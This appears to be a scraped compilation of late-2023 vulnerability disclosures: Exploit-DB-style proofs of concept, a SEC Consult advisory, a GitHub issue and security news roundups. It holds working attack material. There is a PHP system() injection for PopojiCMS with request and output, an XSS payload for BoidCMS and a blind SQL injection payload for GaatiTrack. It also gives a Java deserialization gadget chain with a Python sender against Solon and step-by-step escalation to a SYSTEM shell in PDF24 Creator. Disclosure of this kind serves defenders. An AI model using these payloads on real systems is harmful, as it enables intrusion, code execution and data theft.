PopojiCMS version 2.0.1 is vulnerable to remote command execution in the Meta Social field.

    # Exploit Title: PopojiCMS Version : 2.0.1  Remote Command Execution# Date: 27/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.popojicms.org/# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip# Version: Version : 2.0.1# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS##POC:1 ) Login with admin cred and click settings2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?>3 ) Open main page , you will be see id command result POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1Host: demos5.softaculous.comCookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7DUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=settingContent-Type: application/x-www-form-urlencodedContent-Length: 58Origin: https://demos5.softaculous.comDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closemeta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3EResult: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

CVE-2023-50011: PopojiCMS 2.0.1 Remote Command Execution ≈ Packet Storm

PDF24 Creator versions 11.15.1 and below suffer from a local privilege escalation vulnerability via the MSI installer.

SEC Consult Vulnerability Lab Security Advisory < 20231211-0 >  
=======================================================================  
               title: Local Privilege Escalation via MSI installer  
             product: PDF24 Creator (geek Software GmbH)  
  vulnerable version: <=11.15.1  
       fixed version: 11.15.2  
          CVE number: CVE-2023-49147  
              impact: High  
            homepage: https://tools.pdf24.org/en/creator/  
               found: 2023-10-16  
                  by: Lukas Donaubauer (Office Munich)  
                      Mario Keck (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"pdf24.org is a project of geek software GmbH, a German company based in Berlin,  
that was founded in 2006. PDF24 offers free and easy to use PDF solutions for  
many PDF problems, online and as software for download. Solutions include the  
well-known PDF24 Creator and PDF24 Online Tools."

Source: https://www.pdf24.org/en/about-us

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via MSI installer (CVE-2023-49147)  
The configuration of the PDF24 Creator MSI installer file was found to  
produce a visible cmd.exe window running as the SYSTEM user when using  
the repair function of msiexec.exe. This allows a local attacker to use  
a chain of actions, to open a fully functional cmd.exe with the privileges  
of the SYSTEM user.

Note: This attack does not work using a recent version of the Edge Browser or  
Internet Explorer. A different browser, such as Chrome or Firefox, needs to be  
used. Also make sure, that Edge or IE have not been set to the default browser.

Proof of concept:  
-----------------  
1) Local Privilege Escalation via MSI installer (CVE-2023-49147)  
For the exploit to work, the PDF24 Creator has to be installed via the MSI file.  
Afterwards, any low-privileged user can run the following command to start the  
repair of PDF24 Creator and trigger the vulnerable actions without a UAC popup:

msiexec.exe /fa <PATH TO INSTALLERFILE>\pdf24-creator-11.14.0-x64.msi

At the very end of the repair process, the sub-process pdf24-PrinterInstall.exe gets  
called with SYSTEM privileges and performs a write action on the file  
"C:\Program Files\PDF24\faxPrnInst.log". This can be used by an attacker by simply  
setting an oplock on the file as soon as it gets read. To do that, one can use the  
'SetOpLock.exe' tool from "https://github.com/googleprojectzero/symboliclink-testing-tools"  
with the following parameters:

SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r

If the oplock is set, the cmd window that gets opened when pdf24-PrinterInstall.exe  
is executed doesn't close. The attacker can then perform the following actions to  
spawn a SYSTEM shell:  
- right click on the top bar of the cmd window  
- click on properties  
- under options click on the "Legacyconsolemode" link  
- open the link with a browser other than internet explorer or edge (both don't open as SYSTEM when on Win11)  
- in the opened browser window press the key combination CTRL+o  
- type cmd.exe in the top bar and press Enter

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* 11.14.0 (pdf24-creator-11.14.0-x64.msi)  
* 11.15.1 (pdf24-creator-11.15.1-x64.msi)

A new version was released during our contact attempts (v11.15.1) which is  
also affected by the vulnerability.

The tests were conducted on an up to date Windows 10 system.

Vendor contact timeline:  
------------------------  
2023-10-20: Contacting vendor through team@pdf24.org; no response.  
2023-11-14: Contacting vendor again through team@pdf24.org and stefan@pdf24.org  
             No response.  
2023-11-17: Requesting CVE number  
2023-11-23: Received CVE number  
2023-11-27: Sending vendor CVE number and setting preliminary deadline for  
             advisory release (11th December)  
2023-11-27: Identified that latest version 11.15.1 is also vulnerable.  
2023-11-28: Vendor response, seems our emails ended up in spam.  
             Sending advisory unencrypted upon vendor request.  
2023-12-04: Asking for a status update. Further questions from vendor.  
             Providing more details, clarification regarding Windows 11, browser  
             usage and recommendation for fix.  
2023-12-08: Vendor releases fixed version 11.15.2.  
2023-12-11: Coordinated release of advisory.

Solution:  
---------  
The vendor provides a patched version 11.15.2 which can be downloaded from the  
vendor's website:

https://tools.pdf24.org/en/creator

Also check out the changelog from the vendor for further information:  
https://creator.pdf24.org/changelog/en.html

Workaround:  
-----------  
Use the available EXE installer.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF L. Donaubauer, M. Keck / @2023

PDF24 Creator 11.15.1 Local Privilege Escalation

Microsoft released its final set of Patch Tuesday updates for 2023, closing out 33 flaws in its software, making it one of the lightest releases in recent years.
Of the 33 shortcomings, four are rated Critical and 29 are rated Important in severity. The fixes are in addition to 18 flaws Microsoft addressed in its Chromium-based Edge browser since the release of Patch

Patch Tuesday / Windows Security

Microsoft released its final set of Patch Tuesday updates for 2023, closing out 33 flaws in its software, making it one of the lightest releases in recent years.

Of the 33 shortcomings, four are rated Critical and 29 are rated Important in severity. The fixes are in addition to 18 flaws Microsoft addressed in its Chromium-based Edge browser since the release of Patch Tuesday updates for November 2023.

According to data from the Zero Day Initiative, the software giant has patched more than 900 flaws this year, making it one of the busiest years for Microsoft patches. For comparison, Redmond resolved 917 CVEs in 2022.

While none of the vulnerabilities are listed as publicly known or under active attack at the time of release, some of the notable ones are listed below -

*   **CVE-2023-35628** (CVSS score: 8.1) - Windows MSHTML Platform Remote Code Execution Vulnerability
*   **CVE-2023-35630** (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability
*   **CVE-2023-35636** (CVSS score: 6.5) - Microsoft Outlook Information Disclosure Vulnerability
*   **CVE-2023-35639** (CVSS score: 8.8) - Microsoft ODBC Driver Remote Code Execution Vulnerability
*   **CVE-2023-35641** (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability
*   **CVE-2023-35642** (CVSS score: 6.5) - Internet Connection Sharing (ICS) Denial-of-Service Vulnerability
*   **CVE-2023-36019** (CVSS score: 9.6) - Microsoft Power Platform Connector Spoofing Vulnerability

CVE-2023-36019 is also significant because it allows the attacker to send a specially crafted URL to the target, resulting in the execution of malicious scripts in the victim's browser on their machine.

UPCOMING WEBINAR

Beat AI-Powered Threats with Zero Trust - Webinar for Security Professionals

Traditional security measures won't cut it in today's world. It's time for Zero Trust Security. Secure your data like never before.

Join Now

"An attacker could manipulate a malicious link, application, or file to disguise it as a legitimate link or file to trick the victim," Microsoft said in an advisory.

Microsoft's Patch Tuesday update also plugs three flaws in the Dynamic Host Configuration Protocol (DHCP) server service that could lead to a denial-of-service or information disclosure -

*   **CVE-2023-35638** (CVSS score: 7.5) - DHCP Server Service Denial-of-Service Vulnerability
*   **CVE-2023-35643** (CVSS score: 7.5) - DHCP Server Service Information Disclosure Vulnerability
*   **CVE-2023-36012** (CVSS score: 5.3) - DHCP Server Service Information Disclosure Vulnerability

The disclosure also comes as Akamai discovered a new set of attacks against Active Directory domains that use Microsoft Dynamic Host Configuration Protocol (DHCP) servers.

"These attacks could allow attackers to spoof sensitive DNS records, resulting in varying consequences from credential theft to full Active Directory domain compromise," Ori David said in a report last week. "The attacks don't require any credentials, and work with the default configuration of Microsoft DHCP server."

The web infrastructure and security company further noted the impact of the flaws can be significant as they can be exploited to spoof DNS records on Microsoft DNS servers, including an unauthenticated arbitrary DNS record overwrite, thereby enabling an actor to gain a machine-in-the-middle position on hosts in the domain and access sensitive data.

Microsoft, in response to the findings, said the "problems are either by design, or not severe enough to receive a fix," necessitating that users Disable DHCP DNS Dynamic Updates if not required and refrain from using DNSUpdateProxy.

**Software Patches from Other Vendors**

Other than Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   Amazon Web Services
*   Android
*   Apache Projects (including Apache Struts)
*   Apple
*   Arm
*   Atlassian
*   Atos
*   Cisco
*   CODESYS
*   Dell
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   Google Chromecast
*   Google Cloud
*   Google Wear OS
*   Hikvision
*   Hitachi Energy
*   HP
*   IBM
*   Jenkins
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek (including 5Ghoul)
*   Mitsubishi Electric
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NETGEAR
*   NVIDIA
*   Qualcomm (including 5Ghoul)
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   SolarWinds
*   SonicWall
*   Sophos (backports a fix for CVE-2022-3236 to unsupported versions of the Sophos Firewall)
*   Spring Framework
*   Veritas
*   VMware
*   WordPress
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft's Final 2023 Patch Tuesday: 33 Flaws Fixed, Including 4 Critical

The next parameter in the /accounts/login endpoint of Seafile 9.0.6 allows attackers to redirect users to arbitrary sites.

CVE-2023-28874: Seafile Community Edition - Seafile Admin Manual

BoidCMS 2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting (XSS) issues via the title, subtitle, footer, or keywords parameter in a page=create action.

    # Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip# Version: v2.0.1# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48824Descriptions:BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting(XSS) Authenticated vulnerabilities in the "title, subtitle, footer,keywords" parameters of&nbsp;settings, create page.Steps to Reproduce:1. Request:POST /BoidCMS/admin?page=create HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------9882691211259772119227456445Content-Length: 1492Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/BoidCMS/admin?page=createCookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcUpgrade-Insecure-Requests: 1-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="type"post-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="title"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="descr"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="keywords"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="content"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="permalink"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="tpl"theme.php-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="thumb"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="date"2023-12-02T19:41-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="pub"true-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="token"83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="create"Create-----------------------------9882691211259772119227456445--2. Now use xss payload "><img src=x onerror=alert(1)> on "title,subtitle, footer, keywords" parameters.3. Save and check home.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)

CVE-2023-48824: BoidCMS 2.0.1 Cross Site Scripting ≈ Packet Storm

A Blind SQL injection issue in ajax.php in GaatiTrack Courier Management System 1.0 allows an unauthenticated attacker to inject a payload via the email parameter during login.

    # Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.mayurik.com/# Software Link:https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php# Version: v1.0# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48823Descriptions:Blind SQL injection in ajax.php in GaatiTrack Courier ManagementSystem v1.0 allows an unauthenticated attacker to insert malicious SQLqueries via email parameter.Steps to Reproduce:1. Request:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com&password=1234562. Now use blind sqli query after email parameter. So your request data will be:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823)

CVE-2023-48823: GaatiTrack Courier Management System 1.0 SQL Injection ≈ Packet Storm

Cisco Talos has disclosed 10 vulnerabilities over the past two weeks, including nine that exist in a popular online PDF reader that offers a browser plugin.

Wednesday, December 6, 2023 13:33

Cisco Talos has disclosed 10 vulnerabilities over the past two weeks, including nine that exist in a popular online PDF reader that offers a browser plugin. 

Attackers could exploit these vulnerabilities in the Foxit PDF Reader to carry out a variety of malicious actions, but most notably could gain the ability to execute arbitrary code on the targeted machine. Foxit aims to have feature parity with Adobe Acrobat Reader, the most popular PDF-reading software currently on the market. The company offers paid versions of its software for a variety of users, including individuals and enterprises. There are also browser plugins of Foxit that run in a variety of web browsers, including Google Chrome and Mozilla Firefox. 

Talos’ Vulnerability Research team also found an integer overflow vulnerability in the GPSd daemon, which is triggered if an attacker sends a specially crafted packet, causing the daemon to crash. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

**Multiple vulnerabilities in Foxit PDF Reader **

_Discovered by Kamlapati Choubey._ 

Foxit PDF Reader contains multiple vulnerabilities that could lead to remote code execution if exploited correctly.  

TALOS-2023-1837 (CVE-2023-32616) and TALOS-2023-1839 (CVE-2023-38573) can be exploited if an attacker embeds malicious JavaScript into a PDF, and the targeted user opens that PDF in Foxit. These vulnerabilities can trigger the use of a previously freed object, which can lead to memory corruption and arbitrary code execution.  

TALOS-2023-1838 (CVE-2023-41257) works in the same way, but in this case, it is caused by a type confusion vulnerability.  

Three other vulnerabilities could allow an attacker to create arbitrary HTA files in the context application, and eventually gain the ability to execute arbitrary code on the targeted machine. TALOS-2023-1832 (CVE-2023-39542), TALOS-2023-1833 (CVE-2023-40194) and TALOS-2023-1834 (CVE-2023-35985) are all triggered if the targeted user opens a specially crafted file in the Foxit software or browser plugin. 

**GPSd NTRIP Stream Parsing access violation vulnerability **

_Discovered by Dimitrios Tatsis._ 

An integer overflow vulnerability exists in the NTRIP Stream Parsing functionality of GPS daemon, which is used to collect and display GPS information in other software. A specially crafted network packet can lead to memory corruption. An attacker can send a malicious packet to trigger TALOS-2023-1860 (CVE-2023-43628). 

According to GPSd’s website, this service daemon powers the map service on Android mobile devices and is “ubiquitous in drones, robot submarines, and driverless cars.” 

_Discovered by Claudio Bozzato and Francesco Benvenuto._ 

Talos researchers recently found multiple data integrity vulnerabilities in Buildroot, a tool that automates builds of Linux environments for embedded systems. 

An adversary could carry out a man-in-the-middle attack to exploit TALOS-2023-1845 (CVE-2023-43608) and TALOS-2023-1844 (CVE-2023-45842, CVE-2023-45839, CVE-2023-45838, CVE-2023-45840 and CVE-2023-45841) to execute arbitrary code in the builder. 

As a direct consequence, an attacker could then also tamper with any file generated for Buildroot’s targets and hosts. 

**Malformed Excel file could lead to arbitrary code execution in WPS Office **

_Discovered by Marcin “Icewall” Noga._ 

An uninitialized pointer use vulnerability (TALOS-2023-1748/CVE-2023-31275) exists in the functionality of WPS Office, a suite of software for word and data processing, that handles Data elements in an Excel file.  

A specially crafted malformed Excel file can lead to remote code execution. 

WPS Office, previously known as a Kingsoft Office, is a software suite for Microsoft Windows, macOS, Linux, iOS, Android, and HarmonyOS developed by Chinese software developer Kingsoft. It is installed by default on Amazon Fire tablet devices. 

Talos disclosed this vulnerability in November despite no official fix or patch from Kingsoft after the company did not respond to our notification attempts and failed the 90-day deadline as outlined in Cisco’s third-party vendor vulnerability disclosure policy.

Remote code execution vulnerabilities found in Buildroot, Foxit PDF Reader

An issue was discovered on Connectize AC21000 G6 641.139.1.1256 allows attackers to run arbitrary commands via use of a crafted string in the ping utility.

CVE-2023-24046: Technical Advisory – Multiple Vulnerabilities in Connectize G6 AC2100 Dual Band Gigabit WiFi Router (CVE-2023-24046, CVE-2023-24047, CVE-2023-24048, CVE-2023-24049, CVE-2023-24050, CVE-2023-24051, CVE

Ssolon <= 2.6.0 and <=2.5.12 is vulnerable to Deserialization of Untrusted Data.

**Issue Description**

We recently discovered that Solon provides 'Fury' as a serialization and deserialization solution for RPC. However, our research has found that the corresponding component has a security vulnerability. Attackers can execute a JNDI injection attack using a carefully constructed attack payload.

**Vulnerability Localization**

  
The vulnerability is located at line 25 of the org.noear.solon.serialization.fury.FuryActionExecutor class, as shown in the figure above. Although Fury provides a built-in blacklist to defend against potential deserialization attacks, we will next demonstrate how to bypass this blacklist to carry out an attack.

**Vulnerability Reproduction****Configuring the RPC Service**

Issue #145 has already provided a simple configuration for an RPC server. We just need to add the following dependencies in the pom.xml file:

    <dependency>
      <groupId>org.noear</groupId>
      <artifactId>solon.serialization.fury</artifactId>
      <version>2.6.0</version>
    </dependency>
    <dependency>
      <groupId>com.caucho</groupId>
      <artifactId>quercus</artifactId>
      <version>4.0.66</version>
    </dependency>
    

**Configuring a Malicious LDAP Server**

We use ysoserial(https://github.com/frohoff/ysoserial) to set up a malicious LDAP server for subsequent JNDI injection attacks(Note that in this instance, we are demonstrating using the well-known exploit chain CommonsCollections2. To achieve a similar effect, please configure the corresponding dependencies on the RPC server side.).

**Proof of Concept**

We can obtain the serialized data required for the attack through the following PoC (Proof of Concept).

    RegistryContext registryContext = new RegistryContext("127.0.0.1", 8989, null);
    MemoryModel memoryModel = new MemoryModel();
    memoryModel.bind("evil", registryContext);
    ContextImpl context = new ContextImpl("rmi://localhost:8888/8tr4qv", memoryModel, null);
    Constructor c = QBindingEnumeration.class.getDeclaredConstructors()[0];
    c.setAccessible(true);
    ArrayList<String> list = new ArrayList<>();
    list.add("/evil/8tr4qv");
    QBindingEnumeration enumeration = (QBindingEnumeration) c.newInstance(context, list);
    XStringForFSB xString = Reflections.createWithoutConstructor(XStringForFSB.class);
    Reflections.setFieldValue(xString, "m_strCache", "nxjkas");
    
    HashMap map1 = new HashMap();
    HashMap map2 = new HashMap();
    map1.put("yy",enumeration);
    map1.put("zZ",xString);
    map2.put("yy",xString);
    map2.put("zZ",enumeration);
    
    HashMap s = new HashMap();
    setFieldValue(s, "size", 2);
    Class nodeC;
    try {
      nodeC = Class.forName("java.util.HashMap$Node");
    }
    catch ( ClassNotFoundException e ) {
      nodeC = Class.forName("java.util.HashMap$Entry");
    }
    Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
    nodeCons.setAccessible(true);
    
    Object tbl = Array.newInstance(nodeC, 2);
    Array.set(tbl, 0, nodeCons.newInstance(0, map1, map1, null));
    Array.set(tbl, 1, nodeCons.newInstance(0, map2, map2, null));
    setFieldValue(s, "table", tbl);
    
    byte[] poc = FuryUtil.fury.serialize(s);
    new FileOutputStream(new File("/tmp/serifury")).write(poc);
    

Subsequently, we can use the Python script below to send the malicious serialized data to the server, completing the exploitation (this Python script is also referenced from Issue #145).

    with open("/tmp/serifury","rb") as f:
        body= f.read()
        print(len(body))
        burp0_url = "http://127.0.0.1:8080/rpc/v1/user/getUser"
        burp0_cookies = {"_jpanonym": "\"OWQ0ZTEzNzBlMWFlYTY2NzhhMDMxOWM5MmYzMjc0MzgjMTY2NTU2NDE1MzAwOCMzMTUzNjAwMCNPR1ZpTkRVd05qWXpZbU0xTkRCaU0yRXlabVpoTlRrek5HUXpabVk1TmpJPQ==\"", "Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a": "1665564182"}
        ct = "application/fury"
        burp0_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "deflate",
            "Connection": "close", "Content-Type": ct, "Upgrade-Insecure-Requests": "1",
            "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "none", "Sec-Fetch-User": "?1"}
    
        res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=body, proxies=proxy)
        print(res.text)
    

**Attack Results**

CVE-2023-48967: A new RCE vulnerability · Issue #226 · noear/solon

PHPJabbers Appointment Scheduler version 3.0 suffers from a missing rate limiting control that can allow for resource exhaustion.

    # Exploit Title: PHPJabbers Apointment Scheduler v3.0 - No Rate Limit in Email# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/appointment-scheduler/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48840Descriptions:PHPJabbers Apointment Scheduler v3.0 is vulnerable to Rate limiting.Rate limiting is implemented in web applications and APIs to preventabuse, such as brute-force attacks or excessive requests that couldlead to resource exhaustion. When a rate limit is bypassed or notproperly enforced, it opens the door for attackers to carry outmalicious activities more quickly than intended, potentially leadingto unauthorized access, data breaches, or service disruption.Steps to Reproduce:1. Request Data:POST /1701529051_590/index.php?controller=pjBaseOptions&action=pjActionAjaxSendHTTP/1.1Host: demo.phpjabbers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 426Origin: https://demo.phpjabbers.comReferer: https://demo.phpjabbers.com/1701529051_590/index.php?controller=pjBaseOptions&action=pjActionEmailSettingsSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeoptions_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&value-string-o_smtp_sender=&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test2. Send it to intruder and configure then Start Attack and check mail.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48840)

Tag

#firefox